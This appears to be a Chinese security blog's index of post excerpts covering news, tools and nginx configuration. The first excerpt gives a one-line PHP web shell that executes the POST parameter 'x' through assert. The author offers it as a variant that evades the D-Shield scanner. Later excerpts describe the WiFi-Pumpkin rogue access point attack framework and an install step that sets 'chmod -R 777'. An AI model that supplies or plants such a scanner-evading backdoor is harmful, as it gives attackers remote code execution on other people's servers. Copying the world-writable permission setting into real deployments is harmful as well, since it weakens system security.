前几天给的那个已经进套餐，今天再扔个免杀过D盾的 <?php function today($a, $b) { array_map($a, $b); } today(assert, array($_POST['x'])); ?>

近日Palo Alto公告，计划在其第四财季以4.1亿美元收购Twistlock。Twistlock对于国内用户而言，如果没有特意关注过RSA大会，云安全，容器安全，云原生安全或云工作负载保护平台等相关主题的话，可能不是很熟悉，...

AndroidHttpCapture网络诊断工具 AndroidHttpCapture是一款针对于移动流量劫持而开发的手机抓包软件，可以当作是Android版的Fiddler，主要功能包括：手机端抓包，PING/DNS/TraceRoute诊断、抓包HAR数据上传分...

this channel is blocked because it was used to spread pornographic content.“此频道被屏蔽，因为它用于传播色情内容。” 因为 App Store 的内容审核政策，Telegram 苹果系列设备 (iPhone/iPad/iMac/Macboo...

全新安装 本地安装，安装包资源参考：https://www.lanzous.com/b697801。安装过程比较简单，权限要777：sudo chmod -R 777 路径 一直在检查新版本的连接优化 因为苹果CMS已经关站了，但后台进去后一直...

WiFi-Pumpkin介绍 WiFi-Pumpkin是一款无线Wi-Fi接入点攻击框架，可以轻松创建虚假网络，同时转发与不知情目标之间的合法流量。它有各种功能，包括恶意Wi-Fi接入点，客户端AP上的deauth攻击，探测请求和凭据监...

APubPlat APubPlat是一款开源免费的自动化部署、运维平台，开源堡垒机。 实现了Web界面话的Terminal，可替换xshell等工具。可开启多窗口和批量命令的运行。 友好的持续集成，支持web前端、node、java、...

XSStrike 高级XSS检测套件 XSStrike是一个XSS脚本探测套件，配备了4个手写解析器，一个智能payloads生成器，一个强大的引擎和一个令人难以置信的快速爬虫工具。和xwaf有相似之处，但又有明显的区别。 ...

场景描述 A站点HTTPS，A站点做为中心站，引用B/C/D/E/F……站点的资源进行供给，确定的只有A站点是HTTPS，其它站点可能是HTTP也可能是HTTPS，文件类型不限定，包括但不限于：CSS,JS,IMAGE,MP4,MP3,RAR,ZIP,M3U8...

隐藏版本号 http { server_tokens off; } 经常会有针对某个版本的nginx安全漏洞出现，隐藏nginx版本号就成了主要的安全优化手段之一，当然最重要的是及时升级修复漏洞 开启HTTPS server { listen...